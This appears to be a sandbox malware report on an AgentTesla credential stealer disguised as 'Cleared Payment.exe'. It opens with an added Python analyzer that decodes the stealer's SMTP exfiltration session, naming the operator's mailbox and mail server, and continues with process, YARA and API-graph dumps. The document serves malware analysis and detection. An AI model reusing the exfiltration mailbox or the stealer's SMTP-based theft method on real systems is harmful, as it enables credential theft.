The AUTH LOGIN argument c25wc3NAaXRhbGlhY2FuZGEtaXQuY29t is the base64 of snpss@italiacanda-it.com, the same mailbox that appears as both MAIL FROM and RCPT TO, so the stolen data is mailed from the operator's account to itself; the server's 334 UGFzc3dvcmQ6 challenge decodes to "Password:" (the client's reply to it is not listed in this table). The server advertised STARTTLS but the client never issued it and authenticated on port 587 in the clear, which is why the message content was visible to the Snort rule and why the exfiltration mailbox credentials can be recovered from the capture.
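The exchange above, worked as an added example (my code, not the report's): a small analyzer that replays the submission transcript, decodes the AUTH LOGIN tokens, records that STARTTLS was advertised but never issued, and extracts the envelope and queue id. It goes a little beyond the page in also decoding AUTH PLAIN initial responses. The TRANSCRIPT list is constructed from the commands in the table; the client's reply to the 334 challenge does not appear in the report, so it is absent here and the password resolves to None.

```python
"""SMTP submission transcript analysis (added example, not from the report)."""
import base64
import binascii
import re

# Constructed from the report's command table: "C" = client 192.168.2.6:49714, "S" = server 208.91.199.223:587
TRANSCRIPT = [
    ("S", "220 us2.outbound.mailhostbox.com ESMTP Postfix"),
    ("C", "EHLO 494126"),
    ("S", "250-us2.outbound.mailhostbox.com"),
    ("S", "250-PIPELINING"),
    ("S", "250-STARTTLS"),
    ("S", "250-AUTH PLAIN LOGIN"),
    ("S", "250 CHUNKING"),
    ("C", "AUTH login c25wc3NAaXRhbGlhY2FuZGEtaXQuY29t"),
    ("S", "334 UGFzc3dvcmQ6"),
    # the client's base64 password reply is not shown in the report, so it is omitted here
    ("S", "235 2.7.0 Authentication successful"),
    ("C", "MAIL FROM:<snpss@italiacanda-it.com>"),
    ("S", "250 2.1.0 Ok"),
    ("C", "RCPT TO:<snpss@italiacanda-it.com>"),
    ("S", "250 2.1.5 Ok"),
    ("C", "DATA"),
    ("S", "354 End data with <CR><LF>.<CR><LF>"),
    ("C", "."),
    ("S", "250 2.0.0 Ok: queued as 7291A5006F0"),
    ("C", "QUIT"),
    ("S", "221 2.0.0 Bye"),
]
SMTP_VERBS = re.compile(r"^(MAIL|RCPT|DATA|QUIT|RSET|NOOP|STARTTLS|AUTH|EHLO|HELO)$")


def b64_text(token: str):
    """Decode one SMTP base64 token; None if it is not valid base64."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def analyze_smtp(transcript) -> dict:
    """Walk (side, line) pairs and pull out auth, TLS use, envelope and queue id."""
    res = {"ehlo": None, "starttls_offered": False, "starttls_used": False,
           "auth_mechanism": None, "username": None, "password": None, "auth_ok": False,
           "mail_from": None, "rcpt_to": [], "queue_id": None, "plaintext_credentials": False}
    expect = None  # pending AUTH LOGIN challenge: "user", "pass" or None
    for who, line in transcript:
        if who == "S":
            if line.upper() in ("250-STARTTLS", "250 STARTTLS"):
                res["starttls_offered"] = True
            elif line.startswith("334 "):            # base64 "Username:" / "Password:" prompt
                prompt = (b64_text(line[4:]) or "").lower()
                expect = "pass" if prompt.startswith("password") else "user"
            elif line.startswith("235 "):
                res["auth_ok"], expect = True, None
            elif line.startswith("250 ") and "queued as" in line:
                res["queue_id"] = line.rsplit(" ", 1)[1]
            continue
        cmd = line.split(" ", 1)
        verb = cmd[0].upper()
        if expect and not SMTP_VERBS.match(verb):    # answer to a 334 challenge
            res["username" if expect == "user" else "password"] = b64_text(line.strip())
            expect = None
            continue
        expect = None
        if verb in ("EHLO", "HELO"):
            res["ehlo"] = cmd[1] if len(cmd) > 1 else ""
        elif verb == "STARTTLS":
            res["starttls_used"] = True
        elif verb == "AUTH":
            mech, _, initial = (cmd[1] if len(cmd) > 1 else "").partition(" ")
            res["auth_mechanism"] = mech.upper()
            if mech.upper() == "LOGIN" and initial:           # initial-response form, as in the report
                res["username"] = b64_text(initial)
            elif mech.upper() == "PLAIN" and initial:         # base64(authzid NUL authcid NUL passwd)
                parts = (b64_text(initial) or "").split("\0")
                if len(parts) == 3:
                    res["username"], res["password"] = parts[1], parts[2]
            res["plaintext_credentials"] = not res["starttls_used"]
        elif verb == "MAIL":
            res["mail_from"] = re.search(r"<([^>]*)>", line).group(1)
        elif verb == "RCPT":
            res["rcpt_to"].append(re.search(r"<([^>]*)>", line).group(1))
    return res


if __name__ == "__main__":
    for key, value in analyze_smtp(TRANSCRIPT).items():
        print(f"{key:>22}: {value}")
```

The plaintext_credentials flag is the check worth alerting on in a mail gateway or IDS: an AUTH command on a submission port before any STARTTLS in the same session means the account used for exfiltration, and everything sent afterwards, is readable by anyone on the path.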

                                                          Target ID:0
                                                          Start time:08:35:53
                                                          Start date:17/04/2024
                                                          Path:C:\Users\user\Desktop\Cleared Payment.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Cleared Payment.exe"
                                                          Imagebase:0x220000
                                                          File size:767'488 bytes
                                                          MD5 hash:0DF9817E2867F94E6BF0C066F9D88013
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2110434279.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2110434279.0000000003832000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2110434279.000000000374E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2110434279.000000000374E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:08:35:54
                                                          Start date:17/04/2024
                                                          Path:C:\Users\user\Desktop\Cleared Payment.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\Cleared Payment.exe"
                                                          Imagebase:0x1a0000
                                                          File size:767'488 bytes
                                                          MD5 hash:0DF9817E2867F94E6BF0C066F9D88013
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:08:35:54
                                                          Start date:17/04/2024
                                                          Path:C:\Users\user\Desktop\Cleared Payment.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Cleared Payment.exe"
                                                          Imagebase:0xb00000
                                                          File size:767'488 bytes
                                                          MD5 hash:0DF9817E2867F94E6BF0C066F9D88013
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3325617856.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3325617856.0000000002DFC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3323797943.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3325617856.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3325617856.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:false


                                                            Execution Graph

                                                            Execution Coverage:13.6%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:189
                                                            Total number of Limit Nodes:9
execution_graph: rendered call graph (node and edge dump omitted). API calls reached in the graph: CallWindowProcW, CreateWindowExW, CreateActCtxA, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, GetModuleHandleW, LoadLibraryExW, DuplicateHandle.
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2114625888.0000000008600000.00000040.00000800.00020000.00000000.sdmp, Offset: 08600000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8600000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 021c1a87c6c597e62fc9e116fcb100678029a93bd3979b030593e82db996fec2
                                                            • Instruction ID: a6ed435373892f13b15be42b248be107dd458793881ec27ec17fbd8bb4440d7d
                                                            • Opcode Fuzzy Hash: 021c1a87c6c597e62fc9e116fcb100678029a93bd3979b030593e82db996fec2
                                                            • Instruction Fuzzy Hash: 09524A34A007458FDB14DF28C844B99B7B2FFC9314F2582A9D5586F3A1DBB1A986CF81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2114625888.0000000008600000.00000040.00000800.00020000.00000000.sdmp, Offset: 08600000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8600000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c0f73eb2b4dc79f08de8a2c7b18f022ceee464ad8acd1432e22d1aff56b5994f
                                                            • Instruction ID: f683c933a5e41407aa5f4840537505d5fc0d363c907df5d27fd8c6a6e2080c5e
                                                            • Opcode Fuzzy Hash: c0f73eb2b4dc79f08de8a2c7b18f022ceee464ad8acd1432e22d1aff56b5994f
                                                            • Instruction Fuzzy Hash: 65525A34A00745CFDB14DF28C840B99B7B2FF85314F2582A9D5586F3A2DBB1A986CF81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2114625888.0000000008600000.00000040.00000800.00020000.00000000.sdmp, Offset: 08600000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8600000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f89f006ba7338ad4c80b5eb092eb0653323a7d5b7b2c1ce27244c17bd01f4d99
                                                            • Instruction ID: 950fde06cfd9f5d641fd4aa35dddc18e5dfce2bcf77618c40a368dd6b797cca6
                                                            • Opcode Fuzzy Hash: f89f006ba7338ad4c80b5eb092eb0653323a7d5b7b2c1ce27244c17bd01f4d99
                                                            • Instruction Fuzzy Hash: 0B51F330A182658FC7198A7DD80026BBFB7EB85312F06816BE456CB2C7D274CD06CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 0253E11E
                                                            • GetCurrentThread.KERNEL32 ref: 0253E15B
                                                            • GetCurrentProcess.KERNEL32 ref: 0253E198
                                                            • GetCurrentThreadId.KERNEL32 ref: 0253E1F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: d63e3c7407a4b3443293bdc2b04254852b50da6e4c28153041991aecf9d29d9d
                                                            • Instruction ID: d968543b5d051382da2773d913a3fc5b74c00bc05157760436adbb8100e6e865
                                                            • Opcode Fuzzy Hash: d63e3c7407a4b3443293bdc2b04254852b50da6e4c28153041991aecf9d29d9d
                                                            • Instruction Fuzzy Hash: 085187B09003498FEB19CFA9D948BDEBBF1FF88314F208059E408A7350CB74A944CB66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 0253E11E
                                                            • GetCurrentThread.KERNEL32 ref: 0253E15B
                                                            • GetCurrentProcess.KERNEL32 ref: 0253E198
                                                            • GetCurrentThreadId.KERNEL32 ref: 0253E1F1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 72c3dfb64cccc4314a6ed6b7ce0b1f1eff3f8b3ee15ded003f686976b912f804
                                                            • Instruction ID: e69cc176a489b74e90db53585cde2ab542152ba8957a74785453e5195d9e1128
                                                            • Opcode Fuzzy Hash: 72c3dfb64cccc4314a6ed6b7ce0b1f1eff3f8b3ee15ded003f686976b912f804
                                                            • Instruction Fuzzy Hash: B55164B09003498FEB19CFA9D948BDEBBF1FF88314F208459E408A7350DB74A944CB66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0253C086
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 566f8417506de767be182cb8328c9ca5162f57daa5fbbeeb994324769693caa4
                                                            • Instruction ID: 2f19ce6a918d67bc75daedb9db5004cd9085fadb8865ce30c57a6e86658227b4
                                                            • Opcode Fuzzy Hash: 566f8417506de767be182cb8328c9ca5162f57daa5fbbeeb994324769693caa4
                                                            • Instruction Fuzzy Hash: A4813570A00B058FD725DF69D44079ABBF1FF88308F009A2AD48AD7A50D774E84ACF95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04B62082
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2112557128.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4b60000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: e69a3f051af22368b84a147077c9502859e4f1cff4851aadac23656668b3528e
                                                            • Instruction ID: 78368ad390f747948363d02d73f7de3cf0cb9a45c8aa4ca259d500768358ab79
                                                            • Opcode Fuzzy Hash: e69a3f051af22368b84a147077c9502859e4f1cff4851aadac23656668b3528e
                                                            • Instruction Fuzzy Hash: 745102B1C00249AFDF15CFA9C880ADDBFB1FF48300F24819AE919AB261D775A855CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04B62082
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2112557128.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4b60000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 867490d677927bc5658c92088599025e365bb76f5b7491d987c7fcbd6596fd22
                                                            • Instruction ID: 745535d6cc9431e59de716c596153a79768477dfe2234f75289f49e159db3a96
                                                            • Opcode Fuzzy Hash: 867490d677927bc5658c92088599025e365bb76f5b7491d987c7fcbd6596fd22
                                                            • Instruction Fuzzy Hash: 1751AFB1D00349DFDB14CFA9C984ADEBBB5FF48310F24816AE819AB250D775A885CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04B62082
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2112557128.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4b60000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 6847fc5dca35c32b2190c7a762762a367c941eeb3f6ca5febc39a0ef906b6c32
                                                            • Instruction ID: cb1251579316e938f00ebce8f24800392e698ede7b2294e30f8c0b45a552b35a
                                                            • Opcode Fuzzy Hash: 6847fc5dca35c32b2190c7a762762a367c941eeb3f6ca5febc39a0ef906b6c32
                                                            • Instruction Fuzzy Hash: A841B1B1D00349DFDB14CFA9C884ADEBBB5FF48310F24816AE819AB250D775A845CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 025359C9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: 50c468e81a863a6e3d9395dec0d72e7572f926a76cb5043abf7ceeab54add328
                                                            • Instruction ID: 26509b784d94be68cf83527e91293c3db2d7c5bfd6fd9b937d926527cf5f6a6b
                                                            • Opcode Fuzzy Hash: 50c468e81a863a6e3d9395dec0d72e7572f926a76cb5043abf7ceeab54add328
                                                            • Instruction Fuzzy Hash: 6D41F271C0071DCBEB25CFA9C98478DBBB1BF48704F60806AD508AB251DBB5694ACF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 04B64551
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2112557128.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_4b60000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: CallProcWindow
                                                            • String ID:
                                                            • API String ID: 2714655100-0
                                                            • Opcode ID: 4a62396eeb9d5cf17dcbb069acf2be80be63e801339b8fe9e9b2cac257916dcc
                                                            • Instruction ID: 8f4f695cd5bbc30e070d0fc7d1e155281a262646fae05c788f4221c5266b9103
                                                            • Opcode Fuzzy Hash: 4a62396eeb9d5cf17dcbb069acf2be80be63e801339b8fe9e9b2cac257916dcc
                                                            • Instruction Fuzzy Hash: BF4107B59007099FDB14CF99C488AAABBF6FB88314F24C499E519A7321D774E841CFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 025359C9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: 7f5991b881be722574cc39c2d7523295ff1e4c5593ecad824c9115396599a8f3
                                                            • Instruction ID: aa83509c6e1a4e0616629a5743d7890d2a7a0d5ff03dfbfd1bfd4d02c304d261
                                                            • Opcode Fuzzy Hash: 7f5991b881be722574cc39c2d7523295ff1e4c5593ecad824c9115396599a8f3
                                                            • Instruction Fuzzy Hash: 22410471C0071DCBEB25CFA9C98478EBBF5BF48704F60806AD508AB251DBB56949CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0feef98e81598f3590a4474ebb5eed894c5abaa2e6614fd581d8a298fc9a498a
                                                            • Instruction ID: 808a02ab22bbefcd664349d49fb7df4f4f87885efe60b00beeefcf65b3e2fcc4
                                                            • Opcode Fuzzy Hash: 0feef98e81598f3590a4474ebb5eed894c5abaa2e6614fd581d8a298fc9a498a
                                                            • Instruction Fuzzy Hash: 2231AE71805349CFEB02CFA8C8957EDBBF0FF4A314F94618AC4056B252E774990ACB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0253E36F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: fb43b9701d50d0c04650a4cd1970a8e9101fe5e5d1069290b678ea22c3561a1f
                                                            • Instruction ID: ac6fc21fac96c155a41e53e903561c53f883d4b1bcf6b34cce710008d9050b6c
                                                            • Opcode Fuzzy Hash: fb43b9701d50d0c04650a4cd1970a8e9101fe5e5d1069290b678ea22c3561a1f
                                                            • Instruction Fuzzy Hash: 9121E3B5901249AFDB10CF9AD984ADEBBF9FF48324F14801AE914A3310D378A954CFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0253E36F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: b080afe8a4d8a261c0d605c5880fccb73538918a74649c07d1715569b890f47a
                                                            • Instruction ID: 7276b18937f842dad39867b0d0918e4d5227e0823ec5e3c045ffa8289fee300d
                                                            • Opcode Fuzzy Hash: b080afe8a4d8a261c0d605c5880fccb73538918a74649c07d1715569b890f47a
                                                            • Instruction Fuzzy Hash: A021B3B59002499FDB10CF9AD984ADEBBF4FF48320F14845AE914A3250D374A954CF65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (rendered graph not preserved in this export): basic blocks 253c281-253c2c8, 253c2ca-253c2cd, 253c2d0-253c2ff (calls LoadLibraryExW), 253c301-253c307 and 253c308-253c325; edges 253c281->253c2d0, 253c281->253c2ca, 253c2ca->253c2d0, 253c2d0->253c301, 253c2d0->253c308, 253c301->253c308
                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0253C101,00000800,00000000,00000000), ref: 0253C2F2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: e48911565cd9ebb8470b07bf7557c76129fe0271019f49ff6b7207d59bf2b26a
                                                            • Instruction ID: 7aeff4f90323b11ca629fc3a03026be1733a32d608ba821a6ba7f58e2a1d0626
                                                            • Opcode Fuzzy Hash: e48911565cd9ebb8470b07bf7557c76129fe0271019f49ff6b7207d59bf2b26a
                                                            • Instruction Fuzzy Hash: 041114B6C003498FDB10CF9AC484ADEFBF4FB98714F10852AE559A7200C3B5A545CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0253C101,00000800,00000000,00000000), ref: 0253C2F2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 25a5254e61ad90b5a68b13fd6485b5f1ebca533f1614fd59fdd6f6022795c86a
                                                            • Instruction ID: b9060d185db701df17b3bcb9f1cb107a539d34d9ea297d3888ff4daa83ccbae5
                                                            • Opcode Fuzzy Hash: 25a5254e61ad90b5a68b13fd6485b5f1ebca533f1614fd59fdd6f6022795c86a
                                                            • Instruction Fuzzy Hash: C51144B68003498FDB10CF9AC444ADEFBF4FB88710F10842AE919B7200C3B5A544CFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0253C086
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2107063825.0000000002530000.00000040.00000800.00020000.00000000.sdmp, Offset: 02530000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2530000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 8dcf1c9780a5c9c3ee28e9a8fbfa16f5f97ba947eff146c408b99218436095e9
                                                            • Instruction ID: f61c249acf9f7708664fc30d842f6f5e26421c10f3215757cd41afb6795cfaa2
                                                            • Opcode Fuzzy Hash: 8dcf1c9780a5c9c3ee28e9a8fbfa16f5f97ba947eff146c408b99218436095e9
                                                            • Instruction Fuzzy Hash: 4F110FB6C003498FCB10CF9AC484BDEFBF4BB88624F10856AD418B7210C3B9A545CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106415361.00000000008DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8dd000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fa58aca9ab0f345a2ce2a0f830c1cba9a4ddf3421a1662ff965ad9cec640d6b3
                                                            • Instruction ID: 1f8808f790f84327f90c4b57c0ba7bf6c6f6456fc52f406b9c66fd476595f0e5
                                                            • Opcode Fuzzy Hash: fa58aca9ab0f345a2ce2a0f830c1cba9a4ddf3421a1662ff965ad9cec640d6b3
                                                            • Instruction Fuzzy Hash: 5821C472504344EFDB15DF14E9C0B26BF75FB84318F24C66AD9094A356C336D856CAA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106475309.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8ed000_Cleared Payment.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 94bbff2277879122c323f2e2069421b2d3b566b979021d37f2058fa47864bf01
                                                            • Instruction ID: 9036f8f1048877f5b8d63567fde320fc4e7cf0e0bf9f23d0f8b2ec630b817e29
                                                            • Opcode Fuzzy Hash: 94bbff2277879122c323f2e2069421b2d3b566b979021d37f2058fa47864bf01
                                                            • Instruction Fuzzy Hash: EC213475604784EFCB14DF15D9C0B26BB61FB85318F28C56DD90A8B292C37BD80BCA61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2106475309.00000000008ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 008ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_8ed000_Cleared Payment.jbxd
